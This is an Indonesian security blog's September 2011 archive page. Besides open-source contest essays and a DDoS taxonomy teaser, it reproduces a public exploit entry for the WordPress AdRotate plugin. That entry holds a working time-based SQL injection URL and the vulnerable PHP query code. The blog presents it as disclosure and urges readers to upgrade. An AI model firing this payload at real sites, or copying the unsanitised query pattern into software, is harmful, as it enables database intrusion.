Archive for September, 2011

Artikel : Taksonomi Serangan DDoS (Pengantar)


Taksonomi Serangan DDoS

Klasifikasi berdasarkan tingkat Automasi :

  1. Serangan Manual
  2. Semi Otomatis
  3. Otomatis

Baca lebih lanjut…

Artikel Exploit (3) : WordPress Plugin Adrotate – EDB-ID: 17888 – SQL Injection


Exploit WordPress Plugin Adrotate – EDB-ID: 17888 – SQL Injection

Catatan :

Perlahan, blog tanyarezaervani juga akan memuat beberapa Pembuktian Konsep Eksploit dari database Vulnerabiliti yang ada. Tujuannya adalah untuk pembelajaran juga pengetahuan bagi para pengguna awam di internet serta penguat anjuran untuk melakukan upgrade jika ternyata perangkat lunak Open Source yang anda gunakan masih memiliki kerentanan yang ditunjukkan.

Daftar kerentanan sedang coba dikoleksi di : https://tanyarezaervani.wordpress.com/vulnerability-database/

Penyalahgunaan tutorial berada diluar tanggung jawab pengelola blog.

Setiap tutorial selalu disertai dengan saran untuk mengupgrade versi perangkat lunak yang ada. Baca lebih lanjut…

VulnDB : Plugin AdRotate – EDB-ID: 17888


Sebuah database lengkap sedang coba dirintis di : https://tanyarezaervani.wordpress.com/vulnerability-database/ – Bantuan anda dalam bentuk pengetahuan dan donasi akan sangat membantu.


# Exploit Title: WordPress AdRotate plugin <= 3.6.5 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.5.zip
# Version: 3.6.5 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

---------------
Vulnerable code
---------------
if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = urldecode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;");

Lomba 6 : Blankon Mungubah dari Blank ke On


Blankon Mungubah dari Blank ke On

Oleh : Agus Purnomo

Anda pasti tahu tentang BlankOn yaitu distro khas Indonesia. Yang mengusung konten asli Indonesia tercinta seperti aksara Nusantara. Pada awalnya blankon adalah sebuah komunitas pembangun distro namun mulai rilis BlankOn Ombilin, Komunitas BlankOn  adalah komunitas yang mengajarkan kemandirian bangsa untuk menghasilkan Produk IT serta bagaimana cara memasarkanya.

Blankon bagi saya adalah tempat belajar, berbagi dan pengembangan diri  juga pengembangan jiwa. Tempat untuk belajar segala ilmu mulai ilmu komunikasi, berkomunitas, teknologi informasi khususnya pengenalan FOSS.

Baca lebih lanjut…

Lomba 5 : Indonesia Mendunia Dengan Open Source


Indonesia Mendunia Dengan Open Source

Oleh : Annas Maiyasya

Indonesia dikenal dunia dengan negara yang sedang berkembang. Namun dalam perkembangannya, Indonesia mengalami banyak sekali tantangan dan rintangan untuk menjadi sebuah negara maju. Ini disebabkan Indonesia yang memiliki wilayah teritorial yang begitu sangat luas dan terdiri dari banyak pulau. Selain itu, Indonesia dikenal dengan kultur budaya yang beraneka ragam dari Sabang hingga Marauke dan memiliki masyarakat yang latar belakangnya berbeda-beda. Sehingga untuk menyatukannya membutuhkan tenaga dan pikiran yang ekstra dan memerlukan rentang waktu yang sangat lama. Inilah faktor yang menghambat Indonesia untuk menjadi negara maju. Kondisi Indonesia saat ini begitu sangat memprihatinkan. Indonesia ketinggalan dengan negara lain. Bahkan Indonesia masih ketinggalan juga dengan negara lain yang sedang berkembang. Indonesia ketinggalan di hampir seluruh bidang, terutama di bidang IT.

Baca lebih lanjut…

Lomba 4 : Open Source Versus Penjajahan Software di Indonesia


Open Source Versus Penjajahan Software di Indonesia

Oleh : Bagus Kusuma Loka (Bandar Lampung)

Open Source, mungkin kata itu terdengar sangat asing bagi sebagian besar penduduk Indonesia. Terlebih lagi pelajar yang baru mengenal komputer. Bahkan, bagi yang hobi bermain laptop, facebook, internet, kata itu mungkin masih terdengar asing. Kenapa bisa begitu?

Berasal dari kata Open dan Source, yang berarti Terbuka dan Sumber. Jika digabungkan, menjadi Sumber Terbuka. Jadi, Open Source sendiri adalah jenis aplikasi yang memperbolehkan penggunanya, men “obok-obok jeroan” dari aplikasi yang digunakan, tanpa harus takut melanggar hak cipta, dan itu didapatkan secara gratis. Dibandingkan dengan aplikasi yang berbayar, dimana pengguna hanya boleh menggunakan (tanpa diperbolehkan mengotak-atik isi) jika sudah membayar harga dari aplikasi itu. Inilah titik perbedaan terbesar dari penggunaan aplikasi Open Source versus aplikasi berbayar.

Baca lebih lanjut…

Video Linux Foundation : Linux vs and Microsoft …


Video dari Linux Foundation : Linux vs and Microsoft …

Video yang layak jadi renungan :

Bagaimana menurut anda ?

Tulis di kolom komentar dibawah …

%d blogger menyukai ini: